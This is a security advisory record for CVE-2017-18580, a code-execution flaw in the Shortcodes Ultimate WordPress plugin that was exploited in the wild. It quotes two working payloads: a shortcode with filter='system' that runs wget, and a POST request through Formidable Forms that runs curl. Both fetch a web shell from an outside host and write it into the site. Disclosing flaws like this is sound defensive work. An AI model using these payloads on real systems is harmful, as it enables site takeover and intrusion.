Lucene search
Robert MathewsWPEX-ID:EFAD59C8-E6AE-4167-9C78-D3EA52FE5BBAHistoryOct 31, 2017 - 12:00 a.m.
Shortcodes Ultimate <= 5.0.0 - Authenticated Contributor Code Execution
2017-10-3100:00:00
Robert Mathews
8
0.007 Low
EPSS
Percentile
80.1%
The Shortcodes Ultimate plugin does not sanitize the “filter” argument to the “su_meta”, “su_user”, and “su_post” shortcodes, allowing the filter to be set to the “system()” function which runs arbitrary code. This is being exploited in the wild; I discovered this though analysis of mod_security audit logs on two compromised sites today.
If a contributor creates a draft post with this text:
[su_meta key=1 post_id=1 default='wget http://sazinco.ir/wp-content/shell.txt -O test.php' filter='system']
... then previews that post, Shortcodes Ultimate will run the code and save the malicious file as "test.php".
This is a simplified version of an exploit I saw this morning, which didn't require a contributor role account because it took advantage of the fact that another plugin ("Formidable Forms" accepts untrustedinput and passes it to do_shortcode(). That looked like this:
POST /wp-admin/admin-ajax.php HTTP/1.1
action=frm_forms_preview&form={'asdf-asdf'}&before_html=[su_meta key=1 post_id=1 default='curl http://sazinco.ir/wp-content/shell.txt > ../wp-content/upoad.php' filter='system']&custom_style=1
Related
cvelist
cvelist
CVE-2017-18580
2019-08-22 13:32:55
nvd
nvd
CVE-2017-18580
2019-08-22 14:15:12
wpvulndb
wpvulndb
Shortcodes Ultimate <= 5.0.0 - Authenticated Contributor Code Execution
2017-10-31 00:00:00
prion
prion
Remote code execution
2019-08-22 14:15:00
cve
cve
CVE-2017-18580
2019-08-22 14:15:12